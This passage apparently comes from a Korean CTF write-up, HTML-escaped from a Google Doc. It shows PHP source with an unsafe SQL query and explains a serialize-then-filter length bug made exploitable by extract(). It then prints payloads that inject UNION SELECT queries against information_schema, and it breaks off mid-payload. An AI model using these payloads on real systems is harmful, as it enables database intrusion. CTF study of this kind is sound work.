&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;bi**h&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;H**l&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;foreach&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($filter_word &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;as&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $word)&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$replace &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;str_repeat&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($profanity_word_replace, &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;strlen&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($word));&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$word &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;preg_quote&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($word);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$str &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;eregi_replace&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($word, $replace, $str);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $str;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;function&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#21439c;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;resolve_file&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;()&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;global&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $DB;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$id &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $this&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;attached_file;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($id)&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$DB&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;execute(&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;select realname, path from files where id=${id}&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $DB&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;fetch_arr();&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;NULL&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;};&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:700;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;models.php&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;위 3개의 소스는 이 문제의 핵심인 send.php, show.php, models.php이다. models.php의 경우 index.php를 제외한 거의 대부분의 소스에서 include 하고 있는 소스이며, DB 관련 작업을 처리하는 함수의 정의가 담겨 있다.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;send.php에서 파일을 업로드 할 경우 models.php에 정의되어있는 addfile 함수에서 &amp;nbsp;DB에 파일 경로를 넣어준다. 또한 하나의 파일이 추가될때마다 자동으로 파일의 인덱스를 늘려주는 get_auto_incre 메소드를 사용하고 있다.&lt;/span&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;그리고 add 함수에서 사용자 이름과 해당하는 메시지를 저장하는데, 메시지를 저장할 때 serialize 함수를 이용하여 시리얼라이징 하며, filter 함수를 이용하여 유해 문자를 필터링 한다. 이 때, 시리얼라이징 이후 필터링을 거치기 때문에 s:4:”f**k”와 같이 시리얼라이징 되었을 경우 profanity_word_replace에 설정된 값만큼 4번 반복되어 값이 들어가진다. 현재 이 변수에 설정된 값은 conn.php에 ‘*’로 지정되어있으며, 이는 곧 f**k가 ****로 필터링 된다는 뜻이 된다. 하지만 extract 함수를 index.php에서 사용하고 있기 때문에 profanity_word_replace 변수의 값은 임의로 바꿀 수 있으며, 이를 이용하여 unserialize 함수를 사용하여 시리얼라이징을 해제, 객체화 할 때 취약점이 발생할 수 있다.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;div dir=&quot;ltr&quot; style=&quot;margin-left:0pt;&quot;&gt;&lt;table style=&quot;border:none;border-collapse:collapse;width:468pt&quot;&gt;&lt;colgroup&gt;&lt;col width=&quot;*&quot;&gt;&lt;/colgroup&gt;&lt;tbody&gt;&lt;tr style=&quot;height:0pt&quot;&gt;&lt;td style=&quot;border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;&quot;&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.2;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:700;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;# table name&lt;/span&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.2;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;f**k&quot;;s:13:&quot;attached_file&quot;;s:119:&quot;1 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0, 1) limit 1, 1&quot;;}&lt;/span&gt;&lt;/p&gt;&lt;br /&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.2;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:700;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;# column name&lt;/span&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.2;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span 